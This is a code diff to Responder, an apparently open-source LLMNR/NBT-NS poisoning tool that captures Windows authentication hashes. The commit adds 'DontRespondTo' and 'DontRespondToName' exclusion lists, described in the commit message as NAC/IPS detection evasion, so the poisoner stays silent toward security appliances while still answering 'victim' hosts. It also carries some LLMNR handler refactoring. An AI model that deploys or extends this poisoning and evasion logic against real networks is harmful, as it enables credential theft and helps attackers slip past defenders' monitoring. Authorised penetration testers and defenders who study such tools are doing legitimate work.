Added: DontRespondToName and DontRespondTo; NAC/IPS detection evasion

Responder.conf

@@ -27,6 +27,11 @@ RespondTo =
 ;RespondTo = WPAD,DEV,PROD,SQLINT
 RespondToName = 
 ;
+;DontRespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
+DontRespondTo = 
+;Set this option with specific NBT-NS/LLMNR names not to respond to (default = None). Example: DontRespondTo = NAC, IPS, IDS
+DontRespondToName =
+;
 [HTTP Server]
 ;;
 ;Set this to On if you want to always serve a specific file to the victim.

Responder.py

@@ -23,7 +23,8 @@ from odict import OrderedDict
 from socket import inet_aton
 from random import randrange
 
-parser = optparse.OptionParser(usage='python %prog -i 10.20.30.40 -w -r -f\nor:\npython %prog -i 10.20.30.40 -wrf',
+VERSION = 'Responder 2.1.2'
+parser = optparse.OptionParser(usage='python %prog -i 10.20.30.40 -w -r -f\nor:\npython %prog -i 10.20.30.40 -wrf', version = VERSION,
                                prog=sys.argv[0],
                                )
 parser.add_option('-A','--analyze', action="store_true", help="Analyze mode. This option allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning anything.", dest="Analyse")
@@ -84,6 +85,10 @@ RespondTo = config.get('Responder Core', 'RespondTo').strip()
 RespondTo.split(",")
 RespondToName = config.get('Responder Core', 'RespondToName').strip()
 RespondToName.split(",")
+DontRespondTo = config.get('Responder Core', 'DontRespondTo').strip()
+DontRespondTo.split(",")
+DontRespondToName = config.get('Responder Core', 'DontRespondToName').strip()
+DontRespondToName.split(",")
 #Cli options.
 OURIP = options.OURIP
 LM_On_Off = options.LM_On_Off
@@ -260,7 +265,30 @@ def RespondToNameScope(RespondToName, Name):
     else:
         return False
 
+##Dont Respond to these hosts/names.
+def DontRespondToSpecificHost(DontRespondTo):
+    if len(DontRespondTo)>=1 and DontRespondTo != ['']:
+        return True
+    else:
+        return False
 
+def DontRespondToSpecificName(DontRespondToName):
+    if len(DontRespondToName)>=1 and DontRespondToName != ['']:
+        return True
+    else:
+        return False
+
+def DontRespondToIPScope(DontRespondTo, ClientIp):
+    if ClientIp in DontRespondTo:
+        return True
+    else:
+        return False
+
+def DontRespondToNameScope(DontRespondToName, Name):
+    if Name in DontRespondToName:
+        return True
+    else:
+        return False
 ##################################################################################
 #NBT NS Stuff
 ##################################################################################
@@ -343,6 +371,13 @@ class NB(BaseRequestHandler):
         data, socket = self.request
         Name = Decode_Name(data[13:45])
 
+        if DontRespondToSpecificHost(DontRespondTo):
+            if RespondToIPScope(DontRespondTo, self.client_address[0]):
+                return None
+
+        if DontRespondToSpecificName(DontRespondToName) and DontRespondToNameScope(DontRespondToName.upper(), Name.upper()):
+            return None 
+
         if Analyze(AnalyzeMode):
             if data[2:4] == "\x01\x10":
                 if Is_Finger_On(Finger_On_Off):
@@ -646,7 +681,6 @@ def Is_Anonymous(data):
     if SecBlobLen > 260:
         SSPIStart = data[79:]
         LMhashLen = struct.unpack('<H',data[93:95])[0]
-        print 'LMHASHLEN:',struct.unpack('<H',data[89:91])[0]
         if LMhashLen == 0 or LMhashLen == 1:
             return True
         else:
@@ -1238,6 +1272,8 @@ def IsICMPRedirectPlausible(IP):
     dnsip = []
     for line in file('/etc/resolv.conf', 'r'):
         ip = line.split()
+        if len(ip) < 2:
+           continue
         if ip[0] == 'nameserver':
             dnsip.extend(ip[1:])
     for x in dnsip:
@@ -1266,10 +1302,10 @@ class LLMNR(BaseRequestHandler):
     def handle(self):
         data, soc = self.request
         try:
-            if Analyze(AnalyzeMode):
             if data[2:4] == "\x00\x00":
                 if Parse_IPV6_Addr(data):
                     Name = Parse_LLMNR_Name(data)
+                    if Analyze(AnalyzeMode):
                         if Is_Finger_On(Finger_On_Off):
                             try:
                                 Finger = RunSmbFinger((self.client_address[0],445))
@@ -1286,12 +1322,16 @@ class LLMNR(BaseRequestHandler):
                                 print Message
                                 logger3.warning(Message)
 
+                    if DontRespondToSpecificHost(DontRespondTo):
+                        if RespondToIPScope(DontRespondTo, self.client_address[0]):
+                            return None
+
+                    if DontRespondToSpecificName(DontRespondToName) and DontRespondToNameScope(DontRespondToName.upper(), Name.upper()):
+                        return None 
+
                     if RespondToSpecificHost(RespondTo):
                         if Analyze(AnalyzeMode) == False:
                             if RespondToIPScope(RespondTo, self.client_address[0]):
-                        if data[2:4] == "\x00\x00":
-                            if Parse_IPV6_Addr(data):
-                                Name = Parse_LLMNR_Name(data)
                                 if RespondToSpecificName(RespondToName) == False:
                                     buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
                                     buff.calculate()
@@ -1333,13 +1373,8 @@ class LLMNR(BaseRequestHandler):
                                             except Exception:
                                                 logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
                                                 pass
-                        else:
-                            pass
 
                     if Analyze(AnalyzeMode) == False and RespondToSpecificHost(RespondTo) == False:
-                if data[2:4] == "\x00\x00":
-                    if Parse_IPV6_Addr(data):
-                        Name = Parse_LLMNR_Name(data)
                         if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()):
                             buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
                             buff.calculate()
@@ -2540,5 +2575,3 @@ if __name__ == '__main__':
         main()
     except:
         raise
-
-